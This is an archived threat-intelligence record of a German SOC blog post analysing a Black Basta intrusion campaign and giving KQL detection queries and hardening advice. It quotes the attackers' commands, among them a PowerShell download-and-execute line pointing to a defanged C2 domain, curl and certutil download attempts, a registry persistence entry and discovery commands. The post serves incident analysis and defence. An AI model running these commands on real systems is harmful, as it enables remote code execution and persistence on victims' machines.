{
	"id": "fbc867da-dbe7-4353-989f-f209589493fc",
	"created_at": "2026-04-06T01:31:20.673842Z",
	"updated_at": "2026-04-10T03:31:13.747944Z",
	"deleted_at": null,
	"sha1_hash": "c5929bca13854a4668823cdf25095d2deefe87ff",
	"title": "CyberSOC Insights: Analyse einer BlackBasta Angriffskampagne",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 752499,
	"plain_text": "CyberSOC Insights: Analyse einer BlackBasta Angriffskampagne\r\nPublished: 2025-04-15 · Archived: 2026-04-06 00:55:00 UTC\r\n1. Hintergrund\r\nIm Dezember 2024 beobachtete das Orange Cyberdefense CyberSOC eine Reihe von Social-Engineering-Angriffen, welche mit E-Mail-Bombing starteten und im nächsten Schritt zu einer Kontaktaufnahme mit den\r\nOpfern über Microsoft Teams führten. Ähnliche Vorfälle Ende 2024 wurden von Rapid7 und Trendmicro\r\ngemeldet. Dieser Social-Engineering-Ansatz sowie die Verwendung von DarkGate-Malware wurden in der\r\nVergangenheit mit den Betreibern der Black Basta-Ransomware in Verbindung gebracht. Wie RedSense\r\nberichtete, begannen Angriffe, die zur Ausführung von Black Basta Ransomware führten, einige Jahre zuvor oft\r\nmit einer QBot-Infektion. Nachdem die Strafverfolgungsbehörden die QBot-Server im Jahr 2023 abschalteten,\r\nwurde die Black Basta-Ransomware häufiger in Verbindung mit der DarkGate-Malware als Loader eingesetzt.\r\nSeitdem wurde immer wieder die Nutzung von Microsoft Teams für Social-Engineering-Zwecke bei Angriffen\r\nbeobachtet, die zu Black Basta Ransomware führten. Unser zuletzt veröffentlichter Security Navigator zeigte, dass\r\ndie Gruppe ihre Aktivitäten im vergangenen Jahr ebenfalls deutlich gesteigert hat.\r\nIn der letzten Kampagne, die vom CyberSOC beobachtet wurde, war der erste Indikator für einen Angriff ein\r\nAlarm von Microsoft Defender for Cloud Apps, der darauf hinwies, dass Teams-Chats mit verdächtigen externen\r\nBenutzern gestartet wurden. Dabei handelte es sich um einen externen Account mit dem Anzeigenamen \"Help\r\nDesk Manager\", über den der Zielbenutzer kontaktiert wurde. Eine Überprüfung der E-Mail-Events zeigte, dass in\r\njedem Fall ein massiver Anstieg von Spam-E-Mails den Microsoft Defender Alarmen vorausging. Diese Art von\r\nSocial-Engineering-Angriff wurde erstmals im April 2024 von Rapid7 und Microsoft beobachtet.\r\nAls wir weitere Kunden identifizierten, die mit dieser Social-Engineering-Taktik ins Visier genommen wurden,\r\nüberprüften wir vergangene Vorfälle, die möglicherweise mit dieser Angriffskampagne in Verbindung stehen\r\nkönnten. In enger Zusammenarbeit mit den Kollegen unseres CERT konnte das CyberSOC Anfang Dezember\r\nmehrere Vorfälle mit DarkGate und Lumma Stealer mit dieser groß angelegten Angriffskampagne in Verbindung\r\nbringen.\r\nAnfang Februar rückte die Black Basta Gruppe noch einmal in den Fokus der Cyber Security News, als interne\r\nChats, welche Black Basta Mitglieder zwischen September 2023 und September 2024 geschrieben hatten, geleakt\r\nwurden. Die geleakten Chats enthalten unter anderem Informationen über die Vorgehensweise der Gruppe welche\r\nsich mit den vom CyberSOC beobachteten Aktivitäten decken.\r\n2. Zusammenfassung der Angriffskampagne\r\nDie ersten beobachteten Aktivitäten der Angriffe umfassten eine hohe Menge an Spam-E-Mails, die gezielt gegen\r\neinzelne Nutzer gerichtet waren. Der Zeitraum zwischen dem Beginn des E-Mail-Bombings und der\r\nKontaktaufnahme durch die Angreifer variierte von wenigen Stunden bis zu mehreren Tagen.\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 1 of 13\n\nIn einem Vorfall hatten die Angreifer etwa zwei Stunden nach dem Start des E-Mail-Bombings Zugriff erlangt und\r\nihre Malware-Payloads auf das Zielsystem gebracht. Der initiale Zugriff erfolgte über das Remote Monitoring \u0026\r\nManagement (RMM) Tool Quick Assist, welches später auf ScreenConnect gewechselt wurde. Das\r\nScreenConnect-Setup wurde zusammen mit der Malware in einem ZIP-Archiv bereitgestellt. In anderen Vorfällen\r\nnutzten die Angreifer auch das RMM-Tool AnyDesk.\r\nNeben dem ScreenConnect-Setup enthielt das Archiv fünf weitere Dateien: einen DarkGate-Dropper, ein Lumma\r\nStealer-Payload, eine weitere Executable, um die Zugangsdaten des Opfers zu extrahieren, eine Textdatei mit\r\neinem PowerShell-Befehl sowie eine weitere Textdatei, die die drei Malware-Payloads auflistete. Nachdem das\r\nArchiv auf dem Zielsystem abgelegt wurde, versuchten die Angreifer, die Tools und Malware-Payloads\r\nauszuführen. Da das von uns hier eingesetzte Endpoint Detection \u0026 Response (EDR) Tool Microsoft Defender\r\nverschiedene Ausführungsversuche blockierte, unternahmen die Angreifer mehrere Versuche dies zu umgehen.\r\nDazu zählte unter anderem die erneute Bereitstellung der DarkGate-Malware über die ScreenConnect-Session\r\nsowie mehrere Versuche, Level RMM herunterzuladen. Die Download-Versuche erfolgten mittels PowerShell,\r\ncurl und certutil.\r\nUnsere Analysten konnten diesen und ähnliche Angriffe mit Microsoft Defender und Palo Alto Cortex XDR\r\nidentifizieren und verhindern, bevor die Angreifer mit der nächsten Angriffsphase, dem Lateral Movement,\r\nbeginnen konnten.\r\n3. Technische Analyse\r\n3.1 Verlauf des Angriffs\r\nVerlauf eines vom CyberSOC analysierten Angriffs\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 2 of 13\n\n3.1.1 Initial Access\r\nDie Angreifer begannen ihr E-Mail-Bombing gegen den Nutzer am Morgen mit einem Spitzenwert von rund 200\r\nE-Mails innerhalb von 30 Minuten.\r\nAnzahl der als “Spam” oder „Phishing“ kategorisierten Emails die der Zielbenutzer empfangen hat\r\nÄhnlich wie bei der von Microsoft beschriebenen Vorgehensweise kontaktierten die Angreifer den Benutzer und\r\nrichteten eine Quick Assist-Verbindung ein. Während der Analyse kann diese durch Prozessausführungen von\r\n\"QuickAssist.exe\" sowie mehrere Instanzen von \"msedgewebview2.exe\" nachvollzogen werden.\r\nÜbersetzung und Auswertung der BlackBasta-Chat-Leaks zeigt, wie die Angreifer Spam-Angriffe und die\r\nfolgenden Anrufe koordinierten.\r\n\"Ich flute ihre Mails mit Spam, du rufst an und sagst, dass du ein IT-Administrator bist, du musst einen\r\nSpam-Filter einrichten [...]\"\r\n3.1.2 Delivery\r\nDie Tools und Malware Payloads der Angreifer wurden während der Quick Assist-Verbindung in einem\r\npasswortgeschützten ZIP-Archiv mit dem Namen \"spam.shield_V14.zip\" auf das Zielgerät gebracht.\r\nUm den Inhalt der ZIP-Datei zu analysieren, hat das CyberSOC das Passwort des Archivs mithilfe eines Brute-Force-Angriffs ermittelt. Mit dem Passwort \"stopspam\" konnte das Archiv geöffnet werden.\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 3 of 13\n\nInhalt des Malware-Archivs\r\nDie folgende Tabelle beschreibt den Inhalt des Archivs:\r\nDateiname Beschreibung\r\nScreenConnect.ClientSetup.exe ScreenConnect setup\r\nSecureHost.exe DarkGate Loader\r\nQuickStore.exe Lumma Stealer\r\nSystemStream.dll Credential Harvester\r\nspamfilter_powershell_v19.txt PowerShell-Befehl zum Download von Level RMM\r\ninstructions.txt Auflistung der Malware-Dateien\r\nDie drei Malware-Dateien enthielten Metadaten von legitimer Software – höchstwahrscheinlich in dem Versuch,\r\ndiese Dateien legitim erscheinen zu lassen.\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 4 of 13\n\nAls legitime Software getarnte Malware-Dateien\r\nDie Datei \"instructions.txt\" enthielt die Befehlszeile für die Ausführung des Credential Harvesters sowie die\r\nNamen der DarkGate und Lumma Stealer Malware. Auf die Dateinamen folgte in jeder Zeile ein Kürzel welches\r\nwahrscheinlich auf den Malware Namen hinweist. \"Gate\" nach  \"SecureHost.exe\" könnte sich auf DarkGate\r\nbeziehen, während \"ST\" nach \"QuickStore.exe\" sich auf Lumma Stealer beziehen könnte. Die Bedeutung von\r\n\"F+\" war unklar.\r\nInhalt der Datei “instructions.txt“\r\nEs gab Hinweise darauf, dass die Datei \"instructions.txt\" mit Notepad innerhalb der Quick Assist-Verbindung\r\ngeöffnet wurde, was darauf hindeutet, dass die Angreifer sie mit hoher Wahrscheinlichkeit angesehen haben.\r\nVerlauf der DarkGate Ausführung\r\n \r\nDie erste Malware, die ausgeführt wurde, war DarkGate (\"SecureHost.exe\"), die zunächst die Datei \"Autoit3.exe\"\r\nunter \"C:\\temp\\test\\\" erstellte. Dann wurde die Befehlszeile \"Autoit3.exe c:\\temp\\test\\script.a3x\" ausgeführt\r\n(ähnlich der Aktivität, die zuvor von Rapid7 beobachtet wurde). Die Ausführung des AutoIt Skripts \"script.a3x\"\r\nführte dazu, dass der folgende Befehl, welcher Domain-Informationen abruft, ausgeführt wurde:\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 5 of 13\n\ncmd.exe /c wmic ComputerSystem get domain \u003e C:\\ProgramData\\ghadheh\\hdddcbf\r\nDarauf folgte das Spoofing der Parent-Process-ID eines \"MicrosoftEdgeUpdateCore.exe\"-Prozesses und eine\r\nProcess-Injection in diesen Prozess. Diese Techniken wurden von Microsoft Defender in der Timeline des\r\nbetroffenen Geräts erkannt.\r\nEvent in der Defender Device Timeline\r\nDer DarkGate Payload hat in diesem Vorfall den folgenden Registry Run Key erstellt, um Persistence zu\r\nerreichen.\r\n Software\\Microsoft\\Windows\\CurrentVersion\\Run\\adacfhb\r\nDer folgende Wert wurde innerhalb des Registry keys gespeichert:\r\n “C:\\ProgramData\\ghadheh\\Autoit3.exe\" C:\\ProgramData\\ghadheh\\fdbdbgc.a3x\r\nDer letzte Teil der ersten Ausführung von DarkGate bestand darin, mit dem Keylogging zu beginnen, das während\r\ndes gesamten Vorfalls kontinuierlich durchgeführt wurde. Die bis zu diesem Zeitpunkt beschriebene Aktivität\r\nwurde innerhalb von 5 Minuten nach dem Ablegen des Malware-Archivs auf dem Host abgeschlossen.\r\nDie nächste Aktivität, die über die DarkGate-Malware ausgeführt wurde, war eine Verbindung mit der folgenden\r\nC2-Domäne:\r\ntodayput[.]shop\r\nNachdem die Verbindung hergestellt wurde, wurde über den injizierten Prozess \"MicrosoftEdgeUpdateCore.exe\"\r\neine Eingabeaufforderung initiiert, über die die folgenden Befehle  ausgeführt wurden:\r\n systeminfo\r\n whoami\r\n net user \u003cusername\u003e /domain\r\n ipconfig\r\n ping -n 1 \u003cDomain Controller\u003e\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 6 of 13\n\nAusgeführte Discovery-Befehle\r\nDa einige dieser Aktivitäten blockiert wurden, unternahmen die Angreifer wiederholte Ausführungsversuche.\r\nDabei wurde versucht Befehle sowohl über \"cmd.exe\" als auch \"powershell.exe\" auszuführen. Darüber hinaus\r\nhaben die Angreifer einen neuen DarkGate Payload über ihre ScreenConnect-Verbindung auf das Zielgerät\r\ngebracht. In diesem Fall wurde ein \".vbs\"-Skript mit dem Namen \"1.vbs\" in \"C:\\Windows\\System32\\\" abgelegt.\r\nDies wurde dann über \"cscript.exe\" ausgeführt, was dazu führte, dass der folgende PowerShell-Befehl den C2-\r\nServer des Bedrohungsakteurs kontaktierte, um \"AutoIt3.exe\" und ein \".a3x\"-Skript herunterzuladen.\r\n powershell.exe -Command Invoke-Expression (Invoke-RestMethod -Uri\r\n hxxp://todayput[.]shop:8080/rkypqqyb)\r\nPowerShell-Befehl der durch das Skript “1.vbs” ausgelöst wurde\r\nDies war die letzte DarkGate-Aktivität, bevor unser CyberSOC das Endgerät isolierte.\r\nBlackBasta-Chat-Leaks enthielten ebenfalls Gespräche über die Malware, die die Angreifer verwendeten, darunter\r\nDarkGate.\r\n\"Was ist DarkGate?\r\nder zweite Loader, den wir verwenden\"\r\n3.1.3.2 Credential Harvester\r\nKurz nach der ersten Ausführung von DarkGate wurde der Credential Harvester mit der folgenden Befehlszeile\r\nausgeführt\r\n rundll32.exe SystemStream.dll,NewRegEx\r\nDieser führte ähnliche Aktionen aus, wie sie von Rapid7 beschrieben werden, einschließlich der Ausführung von\r\n\"systeminfo\", \"route print\" und \"ipconfig /all\".\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 7 of 13\n\nCredential Harvester Ausführung\r\nWährend bei dieser Ausführung die Anmelde- und Discovery-Informationen in einer Datei mit dem Namen\r\n123.txt gespeichert wurden, beobachtete Orange Cyberdefense auch andere Vorfälle, bei denen der Dateiname\r\ndata.txt war.\r\nDie BlackBasta-Chat-Leaks enthielten Nachrichten über die vorherige Version des Credential Harvesters, der die\r\ngesammelten Informationen in einer Datei mit dem Namen qwertyuio.txt speicherte.\r\n\"Dann schau hier nach der Datei mit dem Passwort %temp%/qwertyuio.txt”\r\n3.1.3.3 Lumma Stealer\r\nBei dem vom CyberSOC beobachteten Incident, enthielt das Payload-Archiv die Stealer Malware \"Lumma\r\nStealer\". Das einzige nennenswerte Ereignis, das von dieser Malware während des Vorfalls ausgeführt wurde, war\r\nder Versuch, eine Verbindung zu einem \"Steamcommunity\"-Profil herzustellen, das C2-Informationen enthielt.\r\nDieser Ansatz von Lumma Stealer wurde Mitte 2024 beobachtet, wie in diesem Bericht von AhnLab beschrieben.\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 8 of 13\n\nEin von den Angreifern erstelltes Profil auf der Videospiele Plattform „Steam“ mit Command \u0026 Control\r\nInformationen\r\nDer Profilname ergab lev-tolstoi[.]com, wenn es mit ROT11 (Caesar-Chiffre) entschlüsselt wurde.\r\nDa Verbindungen zu Steam in der Umgebung generell blockiert wurden, konnte die \"Lumma Stealer\" Malware die\r\nC2-Informationen nicht abrufen und führte keine weiteren Aktionen aus. Dies zeigt, dass das Blockieren von\r\nPlattformen, die entweder nicht unternehmensrelevant oder von denen bekannt ist, dass sie von Malware\r\nverwendet werden, einen Angriff früh stoppen kann.\r\n3.1.3.4 RMM Tools (Quick Assist, ScreenConnect, AnyDesk, Level RMM)\r\nEtwa zwei Stunden, nachdem das E-Mail-Bombing gegen den Zielbenutzer begonnen hatte, kontaktierten die\r\nAngreifer diesen und bauten erfolgreich eine Quick Assist-Verbindung auf. Während dieser Verbindung wurde das\r\nMalware-Archiv auf dem Zielhost abgelegt. Kurz nachdem die Payloads ausgeführt wurden, wurde eine\r\nScreenConnect-Verbindung initiiert.\r\nDer Wechsel zu ScreenConnect gewährte den Angreifern erweiterte Rechte, da ScreenConnect als Service mit\r\nBerechtigungen auf Systemebene ausgeführt wurde.\r\nDie Angreifer nutzten eine Funktion von ScreenConnect, um Befehle auszuführen, indem „.cmd“-Dateien in das\r\n„temp“-Verzeichnis des Zielsystems abgelegt und diese über cmd.exe ausgeführt werden. Anschließend wurde\r\nScreenConnect verwendet, um eine Datei namens „spamfilter_powershell_v19.txt“ zu übermitteln, die den\r\nfolgenden PowerShell-Befehl enthielt, um „Level RMM“ herunterzuladen und zu installieren:\r\n $env:LEVEL_API_KEY = \u003cAPI Key\u003e; Set-ExecutionPolicy RemoteSigned -Scope\r\n Process -Force;\r\n [Net.ServicePointManager]::SecurityProtocol =\r\n [Net.SecurityProtocolType]::Tls12; $tempFile = Join-\r\n Path ([System.IO.Path]::GetTempPath()) \"install_windows.exe\"; Invoke-\r\n WebRequest -Uri\r\n \"hxxps://downloads[.]level[.]io/install_windows[.]exe\" -OutFile\r\n $tempFile; \u0026 $tempFile\r\nBefehl zum Download von Level RMM (Inhalt der Datei spamfilter_powershell_v19.txt)\r\nDie Ausführung des oben genannten PowerShell-Befehls und alle anschließenden Verbindungsversuche zu\r\n„level[.]io“ wurden blockiert. Weitere Versuche, „Level RMM“ herunterzuladen, beinhalteten die folgenden\r\nBefehle:\r\n runas /user:administrator powershell $env:LEVEL_API_KEY = \u003cAPI Key\u003e;\r\n Set-ExecutionPolicy RemoteSigned -Scope Process -Force;\r\n [Net.ServicePointManager]::SecurityProtocol =\r\n [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path\r\n ([System.IO.Path]::GetTempPath()) \"install_windows.exe\"; Invoke-https://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 9 of 13\n\nWebRequest -Uri \"hxxps://downloads[.]level[.]io/install_windows.exe\" -\r\n OutFile $tempFile;\r\nVariation des Befehls zum Download von Level RMM\r\n curl -o C:\\Windows\\TEMP\\install_windows.exe\r\n hxxps://downloads[.]level[.]io/install_windows.exe\r\nVersuch, Level RMM mit curl als Alternative zu PowerShell herunterzuladen\r\n 'C:\\Windows\\System32\\certutil.exe certutil -urlcache -split -f\r\n hxxps://downloads[.]level[.]io/install_windows.exe\r\n C:\\Windows\\TEMP\\install_windows.exe'\r\nVersuch, Level RMM mit der LOLBIN certutil herunterzuladen\r\nEs wird eingeschätzt, dass die Aktionen des Angreifers teilweise auf der Nutzung von „Level RMM“ basierten, da\r\ndie Versuche, es herunterzuladen, während des gesamten Vorfalls fortgesetzt wurden, bis das CyberSOC das\r\nEndgerät isolierte und den Angriff stoppte.\r\nIn Incidents weiterer Kunden, die mit dieser Angriffskampagne in Verbindung stehen, hat das CyberSOC den\r\nEinsatz alternativer RMM-Tools, einschließlich AnyDesk, beobachtet.\r\nDie BlackBasta-Chats-Leaks deuten auf die Nutzung mehrerer RMM-Tools, sowie auf die Installationsprobleme,\r\nmit denen sie konfrontiert waren, hin. Genannte RMM-Tools in den Chats beinhalteten „QuickAssist“,\r\n„AnyDesk“, „TeamViewer“, „ScreenConnect“ und weitere. Die in den Chats geteilten Befehle zum Herunterladen\r\nvon „Level RMM“ waren ähnlich den Inhalten der Datei „spamfilter_powershell_V19.txt“.\r\n\"AnyDesk wurde für den Download blockiert. Lass uns einen anderen Weg probieren. Ich denk mir\r\njetzt mal was anderes aus\"\r\n4. Erkennung und Maßnahmen\r\nUm sich gegen diese Art von Angriffen zu verteidigen, müssen Unternehmen einen mehrstufigen\r\nSicherheitsansatz implementieren, der gut konfigurierte Sicherheitstools, strenge Softwarerichtlinien und ein\r\n24x7-Team zur Erkennung von Bedrohungen kombiniert, das das Netzwerk kontinuierlich überwacht und in der\r\nLage ist, in Echtzeit auf Warnungen zu reagieren.\r\n4.1 Erkennung der Angriffskampagne\r\nUm diese Angriffe zu erkennen, müssen Unternehmen eine kontinuierliche Überwachung ihrer M365-\r\nInfrastruktur, Hosts und Benutzer sicherstellen. Die Defender Suite von Microsoft bietet nicht nur integrierte\r\nWarnungen zu aktuellen Bedrohungen, sondern auch verschiedene Logs, die von SOC-Teams verwendet werden\r\nkönnen, um benutzerdefinierte Erkennungsregeln zu implementieren. \r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 10 of 13\n\nMit Defender for Endpoint, Defender for Office 365, Defender for Identity und Defender for Cloud Apps haben\r\nSie die Möglichkeit, laufende Angriffe in verschiedenen Phasen der Cyber Kill Chain zu erkennen. Die folgenden\r\nKQL-Abfragen könnten verwendet werden, um das anfängliche E-Mail-Bombing, den Social-Engineering-Angriff\r\nüber Teams, die Keylogging-Aktivitäten der DarkGate-Malware und die Codeausführung über ScreenConnect zu\r\nerkennen. \r\nEmail Bombing\r\n let threshold = 200;\r\n EmailEvents\r\n | where ThreatTypes has_any (\"spam\", \"phish\")\r\n | summarize count() by RecipientEmailAddress, bin(Timestamp, 1d)\r\n | where count_ \u003e threshold\r\n | render timechart\r\nVerdächtige Teams chats (Query von Microsoft)\r\n let suspiciousUpns = DeviceProcessEvents\r\n | where DeviceId == \"alertedMachine\"\r\n | where isnotempty(InitiatingProcessAccountUpn)\r\n | project InitiatingProcessAccountUpn; CloudAppEvents\r\n | where Application == \"Microsoft Teams\"\r\n | where ActionType == \"ChatCreated\"\r\n | where isempty(AccountObjectId)\r\n | where RawEventData.ParticipantInfo.HasForeignTenantUsers == true\r\n | where RawEventData.CommunicationType == \"OneonOne\"\r\n | where RawEventData.ParticipantInfo.HasGuestUsers == false\r\n | where RawEventData.ParticipantInfo.HasOtherGuestUsers == false\r\n | where RawEventData.Members[0].DisplayName in (\"Microsoft Security\",\r\n \"Help Desk\", \"Help Desk Team\", \"Help Desk IT\", \"Microsoft Security\",\r\n \"office\")\r\n | where AccountId has \"@\"\r\n | extend TargetUPN = tolower(tostring(RawEventData.Members[1].UPN))\r\n | where TargetUPN in (suspiciousUpns)\r\nDarkGate Keylogging (Hohe Anzahl von KeyState-API-Aufrufen innerhalb einer Stunde):\r\n let threshold = 500;\r\n DeviceEvents\r\n | where ActionType == \"GetAsyncKeyStateApiCall\"\r\n | summarize count() by DeviceName, InitiatingProcessFileName,\r\n bin(Timestamp, 1h)\r\n | where count_ \u003e threshold\r\nScreenConnect Befehlsausführungen über .cmd Dateien\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 11 of 13\n\nDeviceProcessEvents\r\n | where InitiatingProcessParentFileName ==\r\n \"ScreenConnect.ClientService.exe\" and InitiatingProcessFileName == \"cmd.exe\" and InitiatingProcess\r\n endswith \".cmd\\\"\"\r\n | summarize make_set(ProcessCommandLine) by DeviceName\r\nWie der zeitliche Ablauf des Angriffs zeigt, muss die Erkennung und Eindämmung schnell durchgeführt werden,\r\num Bedrohungsakteure zu stoppen, bevor sie Ransomware ausführen oder Daten exfiltrieren. Orange\r\nCyberdefense bietet einen Managed Threat Detection [XDR] Service an, der auf dem XDR [Extended Detection\r\nand Response] Stack von Microsoft365 Defender basiert. Ein All-in-One-Service, der 24x7, 365 Tage im Jahr eine\r\nVerbesserung der Sicherheitslage, Incident Management, Remote Response, Threat Hunting, benutzerdefinierte\r\nRegeln und Threat Intelligence für alle Microsoft Defender XDR-Module bietet.\r\n4.2 Proaktive Maßnahmen\r\nMicrosoft Teams Security Hardening\r\nUm Social-Engineering-Angriffe abzuwehren, die auf Mitarbeiter in Microsoft Teams abzielen, ist es\r\nentscheidend, externe Benutzer daran zu hindern, mit internen Benutzern zu interagieren. Dazu kann Teams so\r\neingestellt werden, dass keine externen Benutzer Chats, Anrufe oder Dateifreigaben mit internen Benutzern\r\ninitiieren können. Es wird empfohlen, Teams so einzurichten, dass externe Benutzer nur aus Domänen auf der\r\nWhitelist zugelassen werden. Dieser Microsoft-Artikel hilft bei der Implementierung dieser\r\nKonfigurationsänderungen. Der Prozess des Whitelistings von Domänen für externe Partner kann mit Power Apps\r\neinfach automatisiert werden, sodass Benutzer Domänen zur Verifizierung an die IT-Abteilung übermitteln\r\nkönnen.\r\nRemote Monitoring \u0026 Management (RMM) Tool Policies\r\nZur Abwehr von Angriffen, die RMM-Tools ausnutzen, sollten Unternehmen strenge Richtlinien für deren\r\nNutzung festlegen. Eine effektive Strategie besteht darin, nicht genehmigte RMM-Tooldomänen auf Netzwerk-und Hostebene mithilfe von Firewalls, Webfiltern und Microsoft Defender for Endpoint zu blockieren. Erwägen\r\nSie außerdem Whitelisting von Software, um sicherzustellen, dass nur vertrauenswürdige RMM-Tools auf Geräten\r\nausgeführt werden dürfen, um zu verhindern, dass nicht autorisierte Tools ausgeführt werden.\r\nAutoren\r\nFriedl Holzner\r\nTeam Lead CyberSOC\r\nAndré Henschel\r\nAnalyst Cybersecurity\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 12 of 13\n\nSource: https://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nhttps://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "DE",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.orangecyberdefense.com/de/blog/threat/cybersoc-insights-analyse-einer-black-basta-angriffskampagne"
	],
	"report_names": [
		"cybersoc-insights-analyse-einer-black-basta-angriffskampagne"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775439080,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c5929bca13854a4668823cdf25095d2deefe87ff.pdf",
		"text": "https://archive.orkl.eu/c5929bca13854a4668823cdf25095d2deefe87ff.txt",
		"img": "https://archive.orkl.eu/c5929bca13854a4668823cdf25095d2deefe87ff.jpg"
	}
}